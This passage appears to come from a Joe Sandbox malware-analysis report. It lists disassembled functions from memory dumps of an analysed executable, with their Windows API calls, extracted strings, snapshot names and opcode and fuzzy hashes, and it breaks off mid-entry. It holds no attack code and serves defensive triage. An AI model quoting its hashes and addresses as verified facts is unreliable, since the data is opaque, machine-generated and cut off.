                                                                    • Instruction ID: 753263736e04175eec62941f6124b374bf5f2a2560a35fcdd370282be96516b6
                                                                    • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                    • Instruction Fuzzy Hash: 1641B03235AA0381EE56FF16A8507FA6393BB49BF0F1D42359D0987794EA38C4678300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                    • String ID: d
                                                                    • API String ID: 3743429067-2564639436
                                                                    • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                    • Instruction ID: 9bf9351de066f14a7859a37c54e4add3c11ba636ca2b23690ff6006528f05479
                                                                    • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                    • Instruction Fuzzy Hash: 70417437619B86CAE760DF22E5443AE77A2F388B98F048135DA8907758DF3CD556CB00
                                                                    APIs
                                                                    • FlsGetValue.KERNEL32(?,?,?,000001F91B32C7DE,?,?,?,?,?,?,?,?,000001F91B32CF9D,?,?,00000001), ref: 000001F91B32D087
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001F91B32C7DE,?,?,?,?,?,?,?,?,000001F91B32CF9D,?,?,00000001), ref: 000001F91B32D0A6
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001F91B32C7DE,?,?,?,?,?,?,?,?,000001F91B32CF9D,?,?,00000001), ref: 000001F91B32D0CE
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001F91B32C7DE,?,?,?,?,?,?,?,?,000001F91B32CF9D,?,?,00000001), ref: 000001F91B32D0DF
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001F91B32C7DE,?,?,?,?,?,?,?,?,000001F91B32CF9D,?,?,00000001), ref: 000001F91B32D0F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID: 1%$Y%
                                                                    • API String ID: 3702945584-1395475152
                                                                    • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                    • Instruction ID: 0efd72f370d162097aacfc4428c3469f8ef49a7a15edaee114d3e810fdb8b60c
                                                                    • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                    • Instruction Fuzzy Hash: 1211513070E64741FA697F265A5A3FD6243AB447F0F1C43B4983906AEADE28D4238600
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID:
                                                                    • API String ID: 190073905-0
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: 697c5e0ebdf10a1d9ce51cc9d071498c74b9c2b55d706911d7ffe83734e09ff1
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: D8815935A0F643CAFA52BF2AD4413FD6692BB45BE0F5C44B5A904477A6EB38CC678700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                    • String ID: api-ms-
                                                                    • API String ID: 2559590344-2084034818
                                                                    • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                    • Instruction ID: 3cb1725aba75d0ed373d3c7af76e7a4e97cc097ee3e52c08f409f86fafcd2fb8
                                                                    • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                    • Instruction Fuzzy Hash: 0B31A23131BA43E5EE26AF4AA8007FD6296BB48BF0F5D46759D1D4B7A0DF39C4668300
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF72726D29A,?,?,?,00007FF72726CF8C,?,?,?,00007FF72726CB89), ref: 00007FF72726D06D
                                                                    • GetLastError.KERNEL32(?,?,?,00007FF72726D29A,?,?,?,00007FF72726CF8C,?,?,?,00007FF72726CB89), ref: 00007FF72726D07B
                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF72726D29A,?,?,?,00007FF72726CF8C,?,?,?,00007FF72726CB89), ref: 00007FF72726D0A5
                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF72726D29A,?,?,?,00007FF72726CF8C,?,?,?,00007FF72726CB89), ref: 00007FF72726D113
                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF72726D29A,?,?,?,00007FF72726CF8C,?,?,?,00007FF72726CB89), ref: 00007FF72726D11F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                    • String ID: api-ms-
                                                                    • API String ID: 2559590344-2084034818
                                                                    • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                    • Instruction ID: f9e53f16e269562afa3f5040887d718a57797b61f128ee7ca787cd0e7db7c4c3
                                                                    • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                    • Instruction Fuzzy Hash: 1031C821A1A646C1EE11BB13AE00575A3F4FF06B60F99853ADD1D47384EF3DE4478B20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                    • String ID: CONOUT$
                                                                    • API String ID: 3230265001-3130406586
                                                                    • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                    • Instruction ID: 2d848e6f064192455634dcb2dee55ab8152321c340e221ce2a8b97e563a5850a
                                                                    • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                    • Instruction Fuzzy Hash: 6B115E32719B4386E750AF56E8443AA76A1F788FF4F084234EA5A877A4CB78C4268740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                    • String ID: CONOUT$
                                                                    • API String ID: 3230265001-3130406586
                                                                    • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                    • Instruction ID: b8eb21747bf4a755dd220e7e6365e7dc541b952130d6655ef11366b96993c538
                                                                    • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                    • Instruction Fuzzy Hash: AF118131A18A4286E750AB42EE44329B2F1FB89FE4F941234EA5D877A4DF3DD505CB60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID: dialer
                                                                    • API String ID: 756756679-3528709123
                                                                    • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                    • Instruction ID: aa744ba7f13bf3c70bdfc4af3e3b740cce422d50858a027e7928d69d6cb2d4de
                                                                    • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                    • Instruction Fuzzy Hash: 44315E3670AB5796EA15EF16A9407BA67A2FB44BE4F0C8030AE4947B65EF34C4768700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2506987500-0
                                                                    • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                    • Instruction ID: 95d161a0a226ab3465b2de8bb2b3e48ce18acd73a86bb32685aab534e17c9181
                                                                    • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                    • Instruction Fuzzy Hash: 3B11603030F64742FA69BF6656593FD6253AB847F0F5C4774A836476E6DE3884238700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                    • String ID:
                                                                    • API String ID: 517849248-0
                                                                    • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                    • Instruction ID: e7c6c3ab6c815515343c82577837c46998badc912f1ac584b8c18757c0a0eb84
                                                                    • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                    • Instruction Fuzzy Hash: 79015B31709A4386EA50EF52E4583AA63A2FB88FD0F484035EE4943764DE3CC59AC700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                    • String ID:
                                                                    • API String ID: 449555515-0
                                                                    • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                    • Instruction ID: e5e2402d40cf7af65b99b5e34c510fb78bd683f5da0b60b4085048891d2d202e
                                                                    • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                    • Instruction Fuzzy Hash: 4D011E7571EB438AEF24AF16E8493BA72B2BB45BA5F080435DD4907764EF3DC52A8700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 2395640692-629598281
                                                                    • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                    • Instruction ID: 8c255b465b2c64a03163d35d1154c20cc4f7a27cba128eec7142bda6d70ad591
                                                                    • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                    • Instruction Fuzzy Hash: 8B518E3270A6038AEB14EF16E848BBD3797F344BE8F1986B4DA0647748DB35E852C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Message$ByteCharMultiWide
                                                                    • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                    • API String ID: 1878133881-640379615
                                                                    • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                    • Instruction ID: f6c268ae09e24cd283422c7ecb8fe12fb597e119e692265c077d680478b28a55
                                                                    • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                    • Instruction Fuzzy Hash: F32176726187C581E620AB10FA517EAA3F4FF85784F80413AE68C57A59DF3CD646CF60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CombinePath
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3422762182-91387939
                                                                    • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                    • Instruction ID: 4b5ff11c48e12a78e86123c4f17776ea36a652d8bd5e82ba358a163c81dbfeac
                                                                    • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                    • Instruction Fuzzy Hash: 16F0FE7471DB8786EA14AF52B9542AA6662EB48FF0F0C9131EE4647B38DF3CC466D700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                    • Instruction ID: 25d7feeb5665242a175e39a43034526ae1dc950dc40ee34a9559157bb75baef1
                                                                    • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                    • Instruction Fuzzy Hash: FDF09C7131E70781EB146F24E4553FA5362E7847B1F580235D96A852F4DF3CC06AD300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                    • Instruction ID: b5b537f04e9aa2fb915d9d297cecd255020d35fb05f9f1728d80977ea900c108
                                                                    • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                    • Instruction Fuzzy Hash: 3161EC3661EB42C6EB609F16E44036E77A2F3887A4F150175EA8E47BA8DB7CC565CF00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: 32c750a559f32d3c376219a9bc894862f060dd399eaaedac7020dfa3e449292a
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: 0311A372A5EE1712FB647E28E4D13FF1193AF5C374F4C8638A966562F6CA24C8634100
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: 758946b581cfb610046c5730e558816381b5f2090ecff8bd25169f1016d08216
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: 3A11513BF1AE5311F6643F68D5573F715436B683B8F1C0634A9760A6F69A28C8634200
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: 12a6baa78aad9577992bfa13076a7e6bf2ef0424fa3093ee8d3a6198f409df43
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: D8119172A5EA1711FB6C3D2CE4C53F91193AF59374FDC8639AB66072E6DA24CA634100
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                    • Instruction ID: 1a8ea8704c61a72e6a1cb681a0801a326eeceaecb094648298945a42f7f85402
                                                                    • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                    • Instruction Fuzzy Hash: 9B11D026E38A5241F2943124DE5733481F0EF56364F940639EA2EC66DACF2EA8834930
                                                                    APIs
                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF7272798B3,?,?,00000000,00007FF727279B4E,?,?,?,?,?,00007FF727279ADA), ref: 00007FF72727A6BF
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7272798B3,?,?,00000000,00007FF727279B4E,?,?,?,?,?,00007FF727279ADA), ref: 00007FF72727A6DE
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7272798B3,?,?,00000000,00007FF727279B4E,?,?,?,?,?,00007FF727279ADA), ref: 00007FF72727A706
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7272798B3,?,?,00000000,00007FF727279B4E,?,?,?,?,?,00007FF727279ADA), ref: 00007FF72727A717
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7272798B3,?,?,00000000,00007FF727279B4E,?,?,?,?,?,00007FF727279ADA), ref: 00007FF72727A728
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID:
                                                                    • API String ID: 3702945584-0
                                                                    • Opcode ID: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                    • Instruction ID: ba12fc5d10505b3e22b171ca7aad4d6fed65fcd17314cdadef37ca1d048e20de
                                                                    • Opcode Fuzzy Hash: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                    • Instruction Fuzzy Hash: 77112E21E0824242FA5873295F8217DA2F1DF9A7B0E984334D83D0E6D6DF2CA9434E25
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID:
                                                                    • API String ID: 3702945584-0
                                                                    • Opcode ID: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                    • Instruction ID: a2e7ccff2e4b370a725569773907e20bb0ab34d0dab1d6fd8d3834f41ae071f0
                                                                    • Opcode Fuzzy Hash: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                    • Instruction Fuzzy Hash: 3111B620E0920782FA5972295F92179A2F1CF4B770ED85638D93E1E2D2EF2CB4434E35
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                    • API String ID: 3215553584-1196891531
                                                                    • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                    • Instruction ID: c7e3c1ff46fe46ea0efb5bf7cc408a904bb9b0e69e81ef370a6a4140b4d5e45b
                                                                    • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                    • Instruction Fuzzy Hash: F3818F72E0C24385FB64EE25CB50278A6F0EB13B44FD59035DA099F799DB2DE9039E21
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                    • API String ID: 3215553584-4202648911
                                                                    • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction ID: a8adf3255655d7fb91a95ba336ab5d8c89968562ac46bac1ecf9f4b511b447c8
                                                                    • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction Fuzzy Hash: 6C61C37660E24342FA65BF28D544BFE66A3E7657A0F5C4D3DCB06137A8DB34C84E8280
                                                                    APIs
                                                                    Strings
